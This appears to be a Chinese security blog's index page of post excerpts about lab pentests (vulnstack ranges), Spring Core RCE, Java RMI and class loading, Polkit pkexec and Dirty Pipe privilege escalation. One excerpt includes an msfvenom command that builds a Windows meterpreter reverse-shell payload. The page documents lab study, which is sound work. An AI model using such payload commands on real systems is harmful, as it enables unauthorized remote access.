摘要:
这是两段时间打的靶场了,所以前后IP不一样。这样的网络配置三层域网络在:192.68.93.0的c段二层网络:有52的网段,也连通三层网络的93段DMZ:处于192.68.52.0的c段 与kali连通,若是不连通 获取权限后也就是多做一层代理只用到了 Vmnet1 和6 网卡 域用户账户和密码如下 阅读全文
摘要:
0x01环境搭建 这几天一直闹的很火的Spring Core RCE漏洞,来复现记录一下 JDK9及其以上版本; 使⽤了Springbeans包; 使⽤了Spring参数绑定; Spring参数绑定使⽤的是⾮基本参数类型,例如般的POJO即可 Spring框架中的核心组件只有三个:Core、Cont 阅读全文
摘要:
MSF上线CS 1.MSF运行exe上线 先用msfvenom生成一个木马,这里是windows的木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.128 LPORT=6666 -f exe >/root/Payload 阅读全文
摘要:
Java有三种代理模式:静态代理、动态代理和cglib代理。 代理模式是一种设计模式 , 提供了对目标对象额外的访问方式 , 即通过代理对象访问目标对象. 举个例子 , 存在一个 对象A , 但是开发人员不希望程序直接访问 对象A , 而是通过访问一个中介对象B来间接访问 对象A , 以达成访问 对 阅读全文
摘要:
环境搭建 参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 几个靶机IP信息 web-centos:两张网卡 外网一定要配置到NAT 之前傻逼了配的桥接导致出不了网 外网IP 192.168.255.130 内网IP 192.168.93.10 阅读全文
摘要:
JVM中提供了三层的ClassLoader: Bootstrap classLoader:主要负责加载核心的类库(java.lang.*等),构造ExtClassLoader和APPClassLoader。 ExtClassLoader:主要负责加载jre/lib/ext目录下的一些扩展的jar。 阅读全文
摘要:
前面学习了cc链,它被广泛应用与提供Java反序列化接口的攻击中。 今天来学一下RMI,Remote Method Invocation 这里没有单独写注册中心,把注册中心直接就写到服务端里面了 这是我画的一个图来方便理解他的底层原理 简单地在本地实现一个RMI服务的启动 首先是写一个RMITest 阅读全文
摘要:
环境搭建 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ ubuntu上可以再启动一下docker docker start ec 17 09 bb da 3d ab ad 靶机信息 ubuntu:ubuntu 域成员机器 douser:Dotes 阅读全文
摘要:
Linux Polkit 权限提升漏洞漏洞描述 Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进程进行通信的有组织的方式。 近日,国外安全团队发布公告称,在 polkit 的 pkexec 程序中发现了一个本地权限提升漏洞。pkexec 应用程序是一 阅读全文
摘要:
CVE-2022-0847 它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 它类似于CVE-2016-5195 “Dirty Cow”,但更容易被利用。 该漏洞已 在 Linux 5.16.11、5.15.2 阅读全文